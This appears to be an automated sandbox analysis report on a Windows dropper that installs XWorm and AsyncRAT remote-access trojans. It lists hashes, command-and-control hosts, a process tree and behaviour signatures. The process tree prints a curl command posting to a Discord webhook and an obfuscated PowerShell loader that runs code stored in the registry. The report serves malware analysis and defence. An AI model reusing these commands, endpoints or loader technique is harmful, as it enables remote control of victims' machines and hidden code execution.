Analysis
-
max time kernel
150s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 05:28
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240221-en
General
-
Target
Dropper.exe
-
Size
1.4MB
-
MD5
afbd173e05ef8ddabbe10b90f93b6614
-
SHA1
718220c153e1eba3d978eb7d2eb884716797be9f
-
SHA256
9d89f838ab73933fc7a35b409e022dbb33e11c94c306ecfe9710e8ed3a82946e
-
SHA512
5d4f4dcbdf4acbdd84c3da5a8351ff5db0c5091dcb94eb6dfb7b019e0ba342bf74e0bd3eb5b4484e6247561e7325be90e8433ee42137e6cf56fc1d76f29eb31f
-
SSDEEP
12288:C0w1hc0h3LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:CCmwDRPjwuB
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\$77-sdchost.exe family_xworm behavioral1/memory/3020-11-0x0000000000EF0000-0x0000000000F02000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2472 created 436 2472 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Executes dropped EXE 4 IoCs
Processes:
$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-install.exepid process 3020 $77-sdchost.exe 2880 $77-aachost.exe 2588 $77-penisballs.exe 2476 $77-install.exe -
Loads dropped DLL 4 IoCs
Processes:
Dropper.exepid process 2928 Dropper.exe 2928 Dropper.exe 2928 Dropper.exe 2928 Dropper.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2472 set thread context of 2924 2472 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 2080a20265c4da01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepid process 2472 powershell.EXE 2472 powershell.EXE 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe 2924 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exepowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3020 $77-sdchost.exe Token: SeDebugPrivilege 2588 $77-penisballs.exe Token: SeDebugPrivilege 2472 powershell.EXE Token: SeDebugPrivilege 2472 powershell.EXE Token: SeDebugPrivilege 2924 dllhost.exe Token: SeAuditPrivilege 856 svchost.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
Dropper.exetaskeng.exepowershell.EXEdllhost.exedescription pid process target process PID 2928 wrote to memory of 2856 2928 Dropper.exe cmd.exe PID 2928 wrote to memory of 2856 2928 Dropper.exe cmd.exe PID 2928 wrote to memory of 2856 2928 Dropper.exe cmd.exe PID 2928 wrote to memory of 2856 2928 Dropper.exe cmd.exe PID 2928 wrote to memory of 3020 2928 Dropper.exe $77-sdchost.exe PID 2928 wrote to memory of 3020 2928 Dropper.exe $77-sdchost.exe PID 2928 wrote to memory of 3020 2928 Dropper.exe $77-sdchost.exe PID 2928 wrote to memory of 3020 2928 Dropper.exe $77-sdchost.exe PID 2928 wrote to memory of 2880 2928 Dropper.exe $77-aachost.exe PID 2928 wrote to memory of 2880 2928 Dropper.exe $77-aachost.exe PID 2928 wrote to memory of 2880 2928 Dropper.exe $77-aachost.exe PID 2928 wrote to memory of 2880 2928 Dropper.exe $77-aachost.exe PID 2928 wrote to memory of 2588 2928 Dropper.exe $77-penisballs.exe PID 2928 wrote to memory of 2588 2928 Dropper.exe $77-penisballs.exe PID 2928 wrote to memory of 2588 2928 Dropper.exe $77-penisballs.exe PID 2928 wrote to memory of 2588 2928 Dropper.exe $77-penisballs.exe PID 2928 wrote to memory of 2476 2928 Dropper.exe $77-install.exe PID 2928 wrote to memory of 2476 2928 Dropper.exe $77-install.exe PID 2928 wrote to memory of 2476 2928 Dropper.exe $77-install.exe PID 2928 wrote to memory of 2476 2928 Dropper.exe $77-install.exe PID 2928 wrote to memory of 2476 2928 Dropper.exe $77-install.exe PID 2928 wrote to memory of 2476 2928 Dropper.exe $77-install.exe PID 2928 wrote to memory of 2476 2928 Dropper.exe $77-install.exe PID 1356 wrote to memory of 2472 1356 taskeng.exe powershell.EXE PID 1356 wrote to memory of 2472 1356 taskeng.exe powershell.EXE PID 1356 wrote to memory of 2472 1356 taskeng.exe powershell.EXE PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2472 wrote to memory of 2924 2472 powershell.EXE dllhost.exe PID 2924 wrote to memory of 436 2924 dllhost.exe winlogon.exe PID 2924 wrote to memory of 480 2924 dllhost.exe services.exe PID 2924 wrote to memory of 492 2924 dllhost.exe lsass.exe PID 2924 wrote to memory of 500 2924 dllhost.exe lsm.exe PID 2924 wrote to memory of 604 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 684 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 748 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 808 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 856 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 972 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 240 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 332 2924 dllhost.exe spoolsv.exe PID 2924 wrote to memory of 1076 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 1120 2924 dllhost.exe taskhost.exe PID 2924 wrote to memory of 1172 2924 dllhost.exe Dwm.exe PID 2924 wrote to memory of 1212 2924 dllhost.exe Explorer.EXE PID 2924 wrote to memory of 320 2924 dllhost.exe DllHost.exe PID 2924 wrote to memory of 1704 2924 dllhost.exe svchost.exe PID 2924 wrote to memory of 1808 2924 dllhost.exe sppsvc.exe PID 2924 wrote to memory of 2928 2924 dllhost.exe Dropper.exe PID 2924 wrote to memory of 2992 2924 dllhost.exe conhost.exe PID 2924 wrote to memory of 3020 2924 dllhost.exe $77-sdchost.exe PID 2924 wrote to memory of 2880 2924 dllhost.exe $77-aachost.exe PID 2924 wrote to memory of 2588 2924 dllhost.exe $77-penisballs.exe PID 2924 wrote to memory of 1356 2924 dllhost.exe taskeng.exe PID 2924 wrote to memory of 2472 2924 dllhost.exe powershell.EXE PID 2924 wrote to memory of 2500 2924 dllhost.exe conhost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2540b071-678a-448f-a4c1-5da0812adb47}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {1C6B3C81-4611-49D9-B94D-D59B9922CD68} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-181336726890199196346993063320036088751165019595-209369799-1715889996-1778760264"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1852589390-125910951910900645171815424201861272163744980079-10220039661107960434"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5499861c56b2368cb123c027336370b92
SHA1c018376876cc5906681502bdc4c313e9ce4bd6ad
SHA256146a6db11db984e114e8942aa9a684f3c33c8348029cc1406754f134adbb3930
SHA512c585a7e0cf0c860863699a13ae6843babbf13b13246715e9ae5ba8296b4037ee839c09b3648250c6a3687ee01e2ad5a65ebc77aabd42bd3ad7398d6b57f9e077
-
\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
50KB
MD577a71f3a441aa3bf824967e52413bec5
SHA1c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA2561e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA51231c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
memory/436-53-0x0000000000B70000-0x0000000000B95000-memory.dmpFilesize
148KB
-
memory/436-61-0x0000000000BA0000-0x0000000000BCB000-memory.dmpFilesize
172KB
-
memory/436-62-0x000007FEBF700000-0x000007FEBF710000-memory.dmpFilesize
64KB
-
memory/436-63-0x0000000037870000-0x0000000037880000-memory.dmpFilesize
64KB
-
memory/436-54-0x0000000000BA0000-0x0000000000BCB000-memory.dmpFilesize
172KB
-
memory/436-51-0x0000000000B70000-0x0000000000B95000-memory.dmpFilesize
148KB
-
memory/436-55-0x0000000000BA0000-0x0000000000BCB000-memory.dmpFilesize
172KB
-
memory/480-77-0x0000000037870000-0x0000000037880000-memory.dmpFilesize
64KB
-
memory/480-75-0x0000000000080000-0x00000000000AB000-memory.dmpFilesize
172KB
-
memory/480-76-0x000007FEBF700000-0x000007FEBF710000-memory.dmpFilesize
64KB
-
memory/480-69-0x0000000000080000-0x00000000000AB000-memory.dmpFilesize
172KB
-
memory/492-91-0x0000000037870000-0x0000000037880000-memory.dmpFilesize
64KB
-
memory/492-89-0x00000000001C0000-0x00000000001EB000-memory.dmpFilesize
172KB
-
memory/492-90-0x000007FEBF700000-0x000007FEBF710000-memory.dmpFilesize
64KB
-
memory/492-83-0x00000000001C0000-0x00000000001EB000-memory.dmpFilesize
172KB
-
memory/500-97-0x0000000000860000-0x000000000088B000-memory.dmpFilesize
172KB
-
memory/2472-35-0x0000000019F30000-0x000000001A212000-memory.dmpFilesize
2.9MB
-
memory/2472-38-0x0000000077830000-0x00000000779D9000-memory.dmpFilesize
1.7MB
-
memory/2472-36-0x0000000000A80000-0x0000000000A88000-memory.dmpFilesize
32KB
-
memory/2472-37-0x0000000019D80000-0x0000000019DAA000-memory.dmpFilesize
168KB
-
memory/2472-39-0x0000000077610000-0x000000007772F000-memory.dmpFilesize
1.1MB
-
memory/2588-27-0x0000000000200000-0x0000000000246000-memory.dmpFilesize
280KB
-
memory/2588-33-0x0000000000290000-0x0000000000296000-memory.dmpFilesize
24KB
-
memory/2880-19-0x00000000010F0000-0x0000000001106000-memory.dmpFilesize
88KB
-
memory/2924-41-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2924-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2924-43-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2924-47-0x0000000077610000-0x000000007772F000-memory.dmpFilesize
1.1MB
-
memory/2924-48-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2924-46-0x0000000077830000-0x00000000779D9000-memory.dmpFilesize
1.7MB
-
memory/2924-45-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2924-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2928-0-0x0000000074A5E000-0x0000000074A5F000-memory.dmpFilesize
4KB
-
memory/2928-1-0x0000000000BA0000-0x0000000000D10000-memory.dmpFilesize
1.4MB
-
memory/2928-223-0x0000000074A5E000-0x0000000074A5F000-memory.dmpFilesize
4KB
-
memory/3020-11-0x0000000000EF0000-0x0000000000F02000-memory.dmpFilesize
72KB